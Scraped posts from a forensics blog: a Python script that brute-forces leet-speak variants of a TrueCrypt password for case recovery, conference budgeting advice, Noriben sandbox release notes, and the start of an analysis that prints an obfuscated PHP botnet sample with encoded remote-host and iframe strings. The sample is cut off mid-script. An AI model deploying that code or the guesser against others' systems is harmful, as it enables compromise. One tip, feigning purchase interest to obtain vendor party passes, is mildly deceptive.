Abstract: We're living in an age of devices and applications that push the boundaries of dreams, an age of instant gratification, but also the age of Digital Rights Management and Copyright laws. With questionably illegal modifications becoming simple enough for children to use, where does the line get drawn between squeezing more functionality out of your digital devices and software and breaking felony laws? In this talk attendees will explore the justifications and rationales behind the use of questionable hardware and software modifications and understand the mentality behind why their use is rapidly catching on in the general population.
Notable Venues: TechnoForensics



31337 Password Guessing

$
0
0
In the digital forensics and incident response we tend to deal with encrypted containers on a regular basis. With encrypted containers means dealing with various styles and iterations of passwords used to access these containers. In a large-scale incident response, it's not uncommon to have a dedicated spreadsheet that just maintains what passwords open what volumes, with the spreadsheet itself password protected.

But, what happens when you forget that password?



The common problems I've run into have been trying to access a volume months, sometimes years, after the fact. In civil cases, we've been surprised to see a case resurface years after we thought it had been settled, and rushed back to open old archives. This inevitably leaves us asking "Did I use a zero or an `O` for that byte?"

By making a spreadsheet of every possible password permutation, we've always been able to get to the data, but the issue does occasionally pop up.

For instance, in an intrusion-related case, a case agent used their agency's forensics group to seize a laptop drive. The drive contained a user file encrypted with TrueCrypt. Through the telephone-game, the owner says the password is XooXooX, which the responder writes as xooxoox, which is transcribed by the case agent as X00x00x. Attempts to decrypt the volume fail, and being that the original responder has now moved on and no notes were kept, all we're told is that the password is "something like ....".

Reasonable and resourceful shops would then write custom password filters to throw into software like PRTK, using DNA clustering to quickly determine the password. However, you don't work in a reasonable and resourceful shop. You can't afford PRTK. What do you do? Write a password guesser in Python that just uses TrueCrypt.




TrueCrypt has a variety of command-line arguments to automatically mount images given a specified password:


With these in mind, we can craft a command-line argument to mount the volume, and rely upon TrueCrypt's return code (0 or 1) to tell us if the mount was successful or not.

Take the case of an agent who says: "The password is Volleyball. We know the first letter is capitalized, and the rest is in leet speak." Based on this, I write a leet-speak character substitution routine:


def leet_lookup(char):
list = {"a": ["a","A","@"],
"b": ["b", "B", "8"],
"c": ["c", "C", "<"],
"e": ["e", "E", "3"],
"i": ["i", "I", "1"],
"l": ["l", "L", "1"],
"o": ["o", "O", "0"],
"t": ["t", "T", "7"] }
try:
result = list[char.lower()]
except KeyError:
result = [char.lower(), char.upper()]
return result


This little routine lets us create a list of possible substitutions for each byte value. If the specified byte isn't declared, it just returns the upper and lower case version of it.

Now, we put this into action here:

import os
import subprocess

tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe"
tc_file = "E:\\test.tlc"
drive_letter = "P"

def leet_lookup(char):
list = {"a": ["a","A","@"],
"b": ["b", "B", "8"],
"c": ["c", "C", "<"],
"e": ["e", "E", "3"],
"i": ["i", "I", "1"],
"l": ["l", "L", "1"],
"o": ["o", "O", "0"],
"t": ["t", "T", "7"] }
try:
result = list[char.lower()]
except KeyError:
result = [char.lower(), char.upper()]
return result
list = []
# V o l l e y b a l l = 10 chars
for c1 in leet_lookup('v'):
for c2 in leet_lookup('o'):
for c3 in leet_lookup('l'):
for c4 in leet_lookup('l'):
for c5 in leet_lookup('e'):
for c6 in leet_lookup('y'):
for c7 in leet_lookup('b'):
for c8 in leet_lookup('a'):
for c9 in leet_lookup('l'):
for c10 in leet_lookup('l'):
list.append("%s%s%s%s%s%s%s%s%s%s" % (c1, c2, c3, c4, c5, c6, c7, c8, c9, c10))
print "%d passwords calculated. Now testing:" % len(list)

count = 0
for password in list:
count += 1
if not count % 10: print ".",
tc_cmdline = "%s %s /l %s /b /a /m ro /q /s /p %s" % (tc_exe, tc_file, drive_letter, password)
process = subprocess.Popen(tc_cmdline)
returncode = process.wait()
if not returncode:
close_cmdline = "%s /d /l %s /q /s" % (tc_exe, drive_letter)
process = subprocess.Popen(close_cmdline).wait()
print "\r\nPassword found: %s" % password
quit()

The main portion is where we specify the 10 character of Volleyball (which I'm sure could be written cleaner with a Python lambda, but ain't nobody got time for that). This script will try every permutation of Volleyball against a file named "E:\test.tlc", mounting it to drive letter "P:" if successful.


In action, there were 26,244 possible permutations of the file, with a dot written for every 10 tests. After 30 minutes of testing, the correct one was found to be:  V0ll3ybal1



A copy of this code can be found as a GitHub Gist at: https://gist.github.com/Rurik/5521081

Additionally, the same concept can be applied to other products, such as RAR or ZIP password archives.

How to Attend Conferences On A Budget (Part One)

$
0
0
Cons, they are the ultimate thrill ride for many in the Information Security business. A chance to get away from work for a week, to drink heavily and listen to talks, to try and get an eye full of your favorite InfoSec Rockstar as they hang out with other rockstars in the hotel lobby.

As many industries have learned over the past decade, conferences are big business, and a life cycle in and of itself in the industry. Speakers get paid to talk at conferences, sharing new ideas while also advertising for their employers. The masses flock to hear what a speaker says, using a company's allotted training budget. Conference attendance helps build an employee's experience and provides for Continuing Professional Education (CPE) points that apply to contract-mandated certifications. Knowing that such masses are gathered in one spot, large organizations shell out tens of thousands of dollars to sponsor and add their own pieces of flair to a designated conference under their advertising budget.

It's a win-win-win for everyone, and works at every financial scale of the industry. Grass roots conferences work at extremely limited budgets, while hundreds of thousands of dollars flow around Black Hat events where registration and training at Black Hat Las Vegas could put your company back $5,000.

And then... there's you. Fighting the crushing blow of continuous work cycles, not enough resources to even get an hour off for dental work, and no training budget to speak of. Working in the trenches, how do you get to experience this lifestyle and still make your numbers work?




Conference Proposal:
Your primary solution to attend conferences it to provide the perfect pitch, in the form of a conference proposal. This is done either to your immediate management, your client, or to your significant other. Treat this as a Risk Analysis report, where your company and/or team may suffer from an immediate computer-related risk due to you not being able to attend. As with all Risk Analysis reports, you will have to keep a fine balance between costs and the return on investment.

Attendance will likely mean some sort of sacrifices on your part. Don't expect a full ride at first; be prepared to float most of the costs. Since we're likely working on a personal budget, as well as a miser corporate one, we'll need to source budget-friendly methods of attending.

Step One: Pick Your Conference

When asked about a prominent security conference, the top responses are usually Black Hat Vegas, RSA, DEFCON, or one of the SANS conferences.

What people fail to realize is that there are literally hundreds of security conferences, occurring year-round across the globe. It's often said that you can't go a single week without seeing news of a con, an issue that has been highly lampooned by others. But, there's no doubt that there is a conference that's ripe for educational pillaging in your neck of the woods.

Working in Ghetto Forensics, we need to focus first on our cheaper conferences so that we can build up the ammunition required for justification to the big ones. How do you find these conferences? Sites such as SECore (the SECurity Organizer and Reporter Exchange) track the various types of conferences, grouping them by industry, region, and cost.


Security BSides

A casual perusal of SECore's immense database will show you a large number of "BSides" events. Security BSides started as a grassroots movement to empower up-starts to produce their own professional information security conference with little risk. Recognizing the potential for information sharing by providing a low-cost conference alternative to the big names, BSides events have popped up across the globe, some selling out within hours. Volunteer-run and managed, BSides conferences are often more relaxed and informal than professional conferences, in intimate environments that allow you to easily buy a beer for your favorite speaker and ask questions on how to apply their ideas to your environment. And, most important of all, BSides events are free to attend.

Conference costs:
After finding a conference within your region, evaluate the sticker shock of the conference and logistics. A conference registration under $250 will likely require little negotiating for approval. A free conference will probably require none at all. This will vary per environment: if you typically have to fight to get valid licenses for just Windows and Word, you may want to stick to the free conferences. Remember your Risk Analysis; you will want to provide a number that won't immediately cause a refusal by management.

It is entirely possible to reduce, or skip, registration costs altogether. Many conferences have early bird specials where registration is reduced greatly months in advance. Others provide promotional codes to local companies or user groups to garner local attention. When a conference is in your town, being a member of a local security group, or Linux User Group, could pay dividends.

One can always generically search for promotional codes, a standard tactic for savvy web shoppers for years. Using sites like RetailMeNot, it's amazing what you may find...

For cons that are just completely out of your price range, or are already sold out, a possible way to attend could be to volunteer. This is especially useful at BSides events, where most functions are managed by volunteers. For professional conferences, however, you'll find that all of these tasks are managed by an event management company. It doesn't hurt to ask.

SANS conferences have a fair compromise for many attendees by offering a Work Study program. You can attend their training at a reduced rate of $900, but you will also be working 12+ hour days as a classroom helper and putting in a lot of effort to help make the class run.



"Time Off":
Time is one of the most critical items to your employer. Most will balk at paying an employee to spend three days away, so expect to use personal time (PTO) to cover your time at first. Don't worry, the goal is to eventually get your time paid for while in attendance, but it takes effort to get there. Many conferences are weekend-based, or at least Friday/Saturday, so there's often few hours to make up on client-site to be able to attend.

If using PTO is out of the question, inquire about front-loading your hours (working 4-10's) or making time up on another day.



Travel Costs:
Often times, the most expensive portion of a conference is in the logistics to attend it, such as airline and hotel lodging. These expenses are easily forgotten during conference planning and can could cause issues, especially as airline costs rise as the conference date approaches. It's important to plan early and monitor prices constantly.

Tracking airline costs has become easier in recent years. Kayak.com allows you to search for a flight across multiple airlines, and also continually performs that search weekly to provide you updates as the costs increase or decrease:



Both Kayak and Bing Travel provide Cost Confidence metrics, providing insight on whether it's best to buy now or wait for a lower price:


Old adages of travel still apply: Never book flights near the weekends. Always wait until Tuesday or Wednesday to do your searches, the days when fares are cheapest. However, for your Conference Proposal you'll want to build in price slack. Quote a Friday price and buy on Tuesday.

Remember: Even if your company is paying, you will profit by putting in the elbow grease to ensure the cheapest costs.

Lodging Costs:
Hotels often are the most expensive expense for many conferences, but the costs are usually offset by a block-discount rate for attendees at the conference. While this group rate is definitely cheaper than the "on-site booking" price, it may not be the cheapest rate. Gather the rates, then search for all other rates available which would include AAA and government rates.

Those on government travel often find the greatest deals with the per diem rate found at hotels. With travel orders or a government CAC (Common Access Card), one can register under the per diem rate. However, at times this may be more expensive than all other rates, especially in areas where there is a large military presence. Hotels know that govvy travel bookers automatically choose per diem rates, even when their standard hotel rate is cheaper.

Twice have I been asked to supply government ID (CAC) for receiving the government rate, in dozens of stays, so keep your ID on you just in case.

Alternatively, you may choose to stay off-site at another hotel. This approach has its benefits and drawbacks. You may find a slightly lower-class hotel a block down the road for half the price, a great savings in exchange for a short walk.

The Hotel Next Door


For example, with DEFCON currently being held at the Rio in Las Vegas, attendees face a room rate of between $104-118 per night. However, just one block away is the Gold Coast where a standard night is between $34-60 for a room just as nice. Having stayed at the Gold Coast in 2012, I found zero lines for breakfast and lunch, a much quieter atmosphere, and a six-night stay cheaper than three days at the Rio.

Using services like Priceline.com or Hotwire.com, I'd often received $45 rooms a few blocks away compared to the $150 conference rate. When staying for three nights, that's basically receiving two nights free. The major downside to this is that the chosen hotel may be too far away. At this past year's Shmoocon, Priceline put me at L'enfant Plaza while the conference was held near Union Station. While only a 1.5 mile difference, the DC metro stops and walking mandated a 30 minute commute each way. Being offsite also limits your baggage, forcing you to leave the laptop behind or check it with a concierge.

Don't just blindly search for hotels, especially when using sites like Priceline. Resources such as BetterBidding.com can provide details hotel listings (at each star level). For example, RVASec is approaching with the preferred hotel being the Crowne Plaza Richmond Downtown at $112/night. Not a bad deal, but let's dig deeper; we may be able to get into the same hotel for a fraction of the price. A search on BetterBidding's hotel list for Richmond Downtown shows eight hotels downtown, the preferred venue is a 3.5* hotel, and that there are two other hotels with the same rating:


We then take the addresses for these hotels and plot them in comparison to the venue and the conference hotel:


As the conference is off-site from the hotel, there is already driving involved. The conference is at the top-left marker and the con hotel is at the bottom-most marker. The rest are within the same area and a reasonable walk to the con hotel (for meeting with other attendees), with the exception of the one hotel off West Franklin (the Doubletree Hotel). However, as the Doubletree has the same star rating as our con hotel, there is a risk that we'll end up there. At a 12-block (0.8 mile) distance, the risk may be too high for some, who would then want to limit their bids to a lower star rating.

You may also want to scour other nearby Priceline regions. If the venue or con hotel is on the edge of your first region, it may be closer to hotels from a neighboring region.

Begin a Priceline bid and choose the selected region and highest star level that matches the con hotel. Find the "offensive" price by trying sequential low-ball prices in the dialog window ("Tab" out, but don't submit) until you find the lowest value that doesn't provide the bright red window below:


Our lowest non-offensive price is $30 for this star level and region for that time period. This price varies per date, so always check ahead of time. Anything with $10-15 above that value is likely to get rejected, so I attempt for $46. When faced with a rejected bid, you may have to reduce your start level or look to other regions. Each neighboring region has moved our distance from a less than a mile to about 8 miles away. I choose Richmond West, which has lower-end hotels.This eventually netted me a stay at a well-reviewed 2.5* hotel for for $47/night.


Star Levels:

There are many pros and cons to various hotel star levels. As a personal rule, I tend to stay within the 2.5 to 3 star level range. Dropping to 2-star hotels often puts you into undesirable locations or very old and uncomfortable buildings. Anything higher than 3-star and you're being nickel and dimed for each and every expense. You don't want to blow your savings on $15/day Internet charges just to have the experience of a doorman.

The Priceline Upgrade:

Often times, the hotel you get may be an upgrade. While attending Derbycon 2012, I chose the Priceline route and was booked at the Galt House. While it was a four-block walk, there were indoor walkways connecting the hotels, and I had a great room that overlooked the Ohio River for $48/night.


Presenting Your Case:

The most important part is to provide your findings for approval. As many have found, simply asking to go to a conference will be met with quick rejection. As mentioned earlier, this needs to be pitched as a Risk Analysis. That requires that you build up a case for attending, and a case for not attending.

First off, find the schedule for the conference and note talks critical to your business infrastructure. Highlight these topics, taking special note of brand new topics or unique opportunities. Don't just show the topics, but put together an itinerary of which talks you will be attending for the entire stay, ensuring that there are no gaps. What you do when you arrive may vary, but you'll be presenting a solid case for a full work-day of training.

Leverage your certifications, such as the CISSP, which require continuing education "points". If your employer requires you to maintain a certification for contract bids or client work, then conference training should be presented as a way to ensure you maintain it.

Present a full budget for the trip, including hotel and transportation. Steer clear of requests for food, taxis, or car rentals; stick to the primary items. If you plan it well, you may not have to pay for those items once you arrive.

If you're finding little traction, be sure to emphasis the sacrifices that you're willing to take to attend. These could include using PTO, eating on your dime, or even paying for one night of hotel out of pocket.

Leverage your training budget, if you have one within your organization. There may be limitations on what this budget will cover, such as only the registration costs, but that does help lower the overall sticker-shock price of the trip.

And, overall, start small. Conference attendance is an exercise in trust between you and your employer. They want to see a return on their investment, but don't want to risk a large amount of money on that. But starting with small and inexpensive conferences, and continually showing your gained education and experience back to your organization, you'll pave a road for a greater budget.




Have additional ideas for saving money or convincing management to let you travel? Post them as a comment!

Coming Soon in Part Two:


How exactly do you show off your learned experience on your return to guarantee funding for your next trip?  How do you make a conference-friendly working environment to allow your coworkers to attend as well? How do you manage the day-to-day expenses while at the con? We'll cover those in Part Two of this post, coming soon.




Disclaimer: While these tricks can be used to travel as cheaply as possible, they should not be construed as  indication of  lack of training or expense reimbursement from my employer. I do have a training and conference budget, but my company is also an ESOP, so I go out of my way to ensure that I don't squander my training budget on unnecessary frills, allowing me to squeeze more conferences into the same budget.

Noriben Version 1.2 released

$
0
0
In a mad rush of programming while on a plane to BSidesNOLA, and during the conference, I completed a large number of updates, requests, and demands for Noriben.

As a basic malware analysis sandbox, Noriben was already doing a great job in helping people analyze malware more quickly and efficiently. However, it had its bugs that hurt a few outlier cases. Using submitted feedback (through email, twitter, oral, and death threats) I believe that the major issues have been fixed and that the most-needed features have been added.

New Improvements:

  • Timeline support -- Noriben now automatically generates a "_timeline.csv" report that notes all activity in chronological order, with fields for local time and a grouping category. Feedback is welcome for ways to improve this output. For example:
8:16:19,Network,UDP Send,hehda.exe,2520,83.133.123.20:53
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\L
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\U
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\@,a7d89e4e5ae649d234e1c15da6281375
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n,cfaddbb43ba973f8d15d7d2e50c63476
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\clsid
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel,Both
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default),C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.
8:16:19,Registry,RegDeleteValue,hehda.exe,2520,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
  • Tracks registry deletion attempts -- Older versions only tracked successful deletions to the registry, assuming that the keys and values existed. Now, it logs even when the keys don't exist. This opened up a large amount of data that was previously filtered out, such as ZeroAccess removing the services for Windows Defender and Microsoft Update (which weren't running on my analysis VM).
  • Large CSV support -- The old versions of Noriben read the entire procmon CSV into memory and then parsed them for results. This created numerous Out of Memory issues with very large sample files. The new version fixes this by only reading in the data one line at a time.
  • Parse Procmon PMLs -- PML files are the binary database used to store the native events during capture. These are converted to CSVs during runtime, but a number of users have years worth of saved PMLs for previous malware samples. Now, Noriben can just parse an existing PML without having to re-run the malware.
  • Alternate Filter files -- Previous versions of Noriben required that you use one filter file, ProcmonConfiguration.PMC, to store your filters. This created issues for users who maintained multiple filters. A new command line option has been added to specify a filter file. This can be used in conjunction with the "-p" PML parsing option to rescan an existing PML with new filters.
  • Global Blacklists -- There was a need for a global blacklist, where items contained in it (namely executables) would be blocked from all blacklists. That allows for a blacklisted item that doesn't have to be manually added to each and every list. 
  • Error Logging -- In a few unusual cases, Noriben fails to parse an event item from the CSV. While Noriben contains proper error handling to catch these issues, it just drops them and moves on. As these events may contain important items, they are now stored in raw at the end of the Noriben text report for manual analysis. If something looks amiss, and they are extremely important items, the list can be emailed to me for analysis and better handling in future versions.
  • Compartmentalized sections -- This is mostly a back-end, minor feature, All events are now grouped into separate lists for Process, File, Registry, and Network. 

General fixes:

  • Changed "open file" command for Mac OS X to 'open'. OS X is tagged as 'posix'. This allows for Noriben to parse files from a Mac interface, but this is not recommended. Parsing files on a system other than the infected means that system environment variables, such as %UserProfile%, will not be identified correctly.
Noriben has changed its command line arguments, dropped the '-r' (rescan CSV) and introduced more specific arguments per each file type, '-c' (CSV), '-p' (PML), and '-f' (filter):

--===[ Noriben v1.2 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-d]

optional arguments:
  -h, --help                   show this help message and exit
  -c CSV, --csv CSV            Re-analyze an existing Noriben CSV file [input file]
  -p PML, --pml PML            Re-analyze an existing Noriben PML file [input file]
  -f FILTER, --filter FILTER   Alternate Procmon Filter PMC [input file]
  -d                           Enable debug tracebacks

How to Attend Conferences On A Budget (Part Two)

$
0
0

In a previous post, we discussed how to build approval for attending a conference of your choice, based on using technology to find the best-priced venues and travel. This post is a follow-on that focuses on living within a budget while at a conference and what to do afterward to ensure that you can attend more in the future.


M&I/E (Meal and incidental expenses):
M&I/E typically only apply to those working in the public sector and includes a daily meal per diem (directed by the OPM) but may include any other required expenses such as tolls, parking, valet service, and bus/train fare. I find it easier to eat these costs than to try and push them on an employer. Ensure that you maintain receipts for any and all expenses during your trip. Even with a receipt threshold of $25 I, personally, was involved in a long battle over a $21 gas charge that I didn't keep a receipt for. 10x that cost was spent on billable hours arguing over the charge, but it could have been avoided by simply keeping the receipt.

Meals are an important consideration based on the region. While in Las Vegas, meals will eat a large portion of your budget, especially with alcohol charges. Barring this, try to crash every vendor party that you can find, many providing free food and drinks.

Know that a certain vendor is throwing a party? Hit their booth, sound extremely interested in their product... then take a fake phone call. Offer sorrow that you have to leave, and that you really wanted to ask them more questions, but that your schedule is full until day X and Y o'clock (the same time as the party). Many companies hold a few party passes back for potential customers, and they will likely forget your face by the next time you see them. While some may consider this social engineering, it's simply taking advantage of sales tactics. Worried about getting flooded by emails and sales calls? Make a new email address for yourself and print up your own set of business cards to hand out.

In many areas, such as Las Vegas, taxi costs will also eat up a large amount of your budget. For Vegas, I've found it sometimes easier to map out a route using shuttle busses. A quick walk to a neighboring casino could net you a seat on a shuttle to a sister casino, that is a few blocks away from your destination. Additionally, when approaching a massive taxi line, there's no shame in going down the line to see if anyone is going to, or near, your destination. As a culture, Americans are hesitant to share, including cab rides, so if you find someone who is hesitant steer them toward the cost savings and volunteer to pick up the tip. You'll still get to your destination cheaper, and faster. Additionally, it never hurts to make friends with someone there on business. This allows you to tag along on taxi rides that are just going to be expensed by someone else (but buy them a beer if this becomes common).




Note Taking and Building Content
The most critical process while attending conferences is to simply attend the talks, a step that many somehow forget. If you do find yourself actually in attendance at a talk, and hopefully one that you pitched to your management ahead of time, it is now somewhat critical to take notes on the talk. There are many ways in which this is done, depending on your style and typing speed.

A natural typist will have no problem transcribing each and every slide as they appear while following the conversation. Others may just focus on the high level points, while some just lean back with their eyes glazed and try to keep up. There is no problem with any of these approaches, nor any person who exhibit these styles. Get what you can down on paper during the talk, and a little bit more between talks.

To make the best of your time, it's important to determine within the first few minutes if the slide deck can be made available to attendees afterward or not. If you can get your hands on the verbatim slide deck, then your note taking will be greatly reduced. Want to make sure? Ask the speaker before they start. Don't be an askhole and introduce yourself, just bark the question as they're setting up and wait for a yes/no answer. Larger conferences have policies in place for sharing power point decks already established, and some (e.g. DEFCON) provide the slides on a DVD at registration well before the talk. But, do your due diligence. Many times you see a Powerpoint file on the DVD and expect it to be complete, only to find that it's a simple one-slide placeholder. Don't fault the presenter, these decks are due sometimes months before the conference, while most development occurs in the hours, or minutes, before the actual talk.

Your note taking should complement the slides but also correlate back to your own work practices. The notes should contain excerpts from the talk mixed with situations from work where the processes could be applied.

Avoiding the Backpack
A typical view when walking around many conferences is that of backpacks. Heavy, lumbering, cloth bags containing massive amounts of electronics. Backpacks blocking pathways and adding another two feet of floor space to a group that's already known for being overweight. While it's tempting to bring along your 19" laptop to a talk to bang out notes on a full size laptop (which, honestly, I tend to do), pack lighter. Cheap Chromebooks and netbooks can be easily carried, and the many Android tablets are the perfect size to fit within your pants pockets while being a fully functional tablet. My favorite fall back is the very inexpensive Nook Color, which has a web browser and notepad while fully fitting in within my front pants pocket.


Miss a talk?
It happens. A talk you really wanted to attend, and you missed it. Maybe it was rescheduled, you couldn't get in to find a seat, you had to take a business/home phone call, or you slept through it. It's not the end of the world, and you can do your best to catch up. Try to find the presenter and acquire their slide deck. Hunt them on Twitter and try to buy them a few drinks in exchange for 15 minutes of conversation. Find others who sat through the talk and get their opinions and perspectives on it.


Training Back Brief
The most important part of the process of the Back Brief, a/k/a the After Action Report (AAR), a/k/a the information sharing. Want to ensure that you are chosen to attend other conferences? Then make sure that you bring back the con experience for others, sans alcohol.

Based on the size of your team, it's implausible that the entire team will be attending the same conference. The worst thing you can do is to take a week off to attend a conference, just to return and get back into your normal routine while telling stories of all the parties you attended. This helps no one and makes you look like a jerk.

Based on earlier advice, you should have taken copious notes during the presentation, or have possession of the slide deck with your notes. Now it's time to apply this to your environment. Let's explore these applications in terms of least effort to most.

  1. Provide verbatim slides to coworkers (inform) - The least amount of effort is to acquire the slide decks from the conference and provide them to your coworkers on a file share. While this quickly supplies the content to your team, it provides no additional context for sending you to the conference. Everyone on the team already has the ability to acquire most of these slides without spending $1000 and lost work time to send someone on-site.
    1. Video recordings fall into this same category. They capture your experience, but only from the perspective of the speaker. As more conferences record and store videos, or even live stream talks, the benefit of sitting in the audience holds less importance than it did in earlier years.
  2. Provide your raw notes to coworkers (inform) - Earlier, I suggested keeping live notes on talks as you view them. While these notes encapsulate the main topics of the talk, they may not be as clear and detailed to the reader as it is to the note-taker. They are best applied as context to a slide deck, or provided in a more fleshed out narrative style. But, they are useful for time sensitive topics.
  3. Provide briefings back to coworkers (inspire) - While this requires a penchant for public speaking, one of the most visible and effective methods of sharing information is to simply give the presentation again. Often, a one hour presentation can be reduced to simply 15-30 minutes when it is focused on your actual work processes, once all of the "scaffolding" to the talk is removed (speaker bio, why this is important, how we got here, etc). A tool presented at a conference? Run the tool against actual data from your environment and show off the results. Use it as a teaser to inspire others to take up the project and do more with it. 
  4. Update your work processes (empower) - The most difficult effort, but the most effective, is to use knowledge gained to reconstruct your processes and work flow to be better and more efficient. While your team may be good at forensics, a recent talk on Plaso, and further experimentation, may show that you would be able to close an examination faster by days. Instead of just providing a briefing, work the new information into formal Standard Operating Procedures. Update your internal wiki pages to note how to use the tool. Write automated front-end scripts to run the tools directly against data in your environment. Use conferences as a means to improve your day-to-day operations!

Back Brief Example:

In late 2006, I was invited to attend the first Microsoft Law Enforcement Technology (LE Tech) conference. The conference was put on to provide deep-dive forensic details on the new Microsoft products (Vista, Office 2007, etc) that were coming out a few months later, at a FOUO/LE Sensitive level. While I was at Microsoft Campus in Bellevue, senior management at my day client were having a retreat to discuss upcoming challenges and how to address them. During my 8-hour flight home, I was able to formalize my raw notes into an indexed Word document (with table of contents) and quickly sent them to the project lead upon landing. This 20-page Word document instantly became required reading for the retreat.

Upon returning to work, I immediately broke down the topics into six distinct portions. For example, Vista, DOCX file formats, UAC and its impact on forensics, etc. For each, I worked with two colleagues who attended with me to put together a basic Powerpoint slide deck based on the notes we took. We then scheduled and gave a weekly one-hour presentation on each topic. These "brown bag" sessions were well attended and were also recorded, with the videos hosted internally for others to view.

All told, it was a lot of work, but one that paid off. It not only helped me go to more conferences on the customer's dime, but also helped pave the way for others to attend similar conferences. It also set the bar of expectation: if you're going to a conference on the client's tab, you will be expected to share what you learned.


Keep the ball rolling:
The hardest part of this whole process is that of enduring to the end. It's easy to want to show off for the first few trips and design excellent training upon your return. Many people become lax over time, however, and start to take advantage of the privilege of a training budget. While your brief back from 2011 may have been ground breaking, what have you done lately?

By careful planning, price-conscious logistics booking, and a studious effort to take notes and share information with your coworkers, you should be able to break ground in an industry where employers may be hesitant to send you to training. Be mindful that the entire purpose is to provide a return on investment to your employer for sending you. 

How To: Static analysis of encoded PHP scripts

$
0
0
This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<?$GLOBALS['_584730172_']=Array(base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n'),base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'='),base64_decode(''.'ZG'.'Vma'.'W'.'5l'),base64_decode(''.'ZGlyb'.'mFtZQ=='),base64_decode('ZGVm'.'aW5l'),base64_decode(''.'d'.'W5saW5r'),base64_decode('Zml'.'sZ'.'V9le'.'G'.'lzdHM='),base64_decode('dG91Y2'.'g='),base64_decode('aXNfd3J'.'p'.'dGFibGU='),base64_decode('dHJ'.'p'.'bQ=='),base64_decode('ZmlsZ'.'V9nZXRf'.'Y29udGVud'.'HM='),base64_decode('dW5s'.'aW5r'),base64_decode('Zm'.'lsZ'.'V9nZXRf'.'Y2'.'9u'.'dGVudHM='),base64_decode('d'.'W5'.'saW5r'),base64_decode('cH'.'JlZ19'.'tYX'.'Rj'.'aA=='),base64_decode('aW1wb'.'G9kZ'.'Q=='),base64_decode('cHJlZ19t'.'YXRja'.'A=='),base64_decode('a'.'W1w'.'bG9k'.'Z'.'Q=='),base64_decode('Zml'.'s'.'ZV'.'9nZXRfY'.'29'.'udGV'.'udH'.'M='),base64_decode('Z'.'m9w'.'ZW4='),base64_decode(''.'ZmxvY'.'2'.'s'.'='),base64_decode('ZnB1'.'dH'.'M='),base64_decode('Zmx'.'vY'.'2s'.'='),base64_decode('Zm'.'Nsb3'.'Nl'),base64_decode('Z'.'mlsZV9leG'.'lzdH'.'M='),base64_decode('dW5zZX'.'JpYWx'.'pemU='),base64_decode('Z'.'mlsZV9nZXRfY29udGVu'.'dHM='),base64_decode('dGlt'.'ZQ'.'='.'='),base64_decode('Zm'.'ls'.'Z'.'V9n'.'ZX'.'RfY29'.'ud'.'GVu'.'dHM='),base64_decode('d'.'GltZ'.'Q=='),base64_decode('Zm9w'.'ZW4='),base64_decode('Zmx'.'vY2s='),base64_decode(''.'ZnB1dHM='),base64_decode('c2VyaWFsaX'.'pl'),base64_decode('Zm'.'xvY2s='),base64_decode('ZmNsb'.'3N'.'l'),base64_decode('c'.'3Vic3Ry'),base64_decode(''.'a'.'GVhZGVy'),base64_decode('aGVhZGV'.'y'));?><?function_1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');returnbase64_decode($a[$i]);}?><?php$GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND$_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__)._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(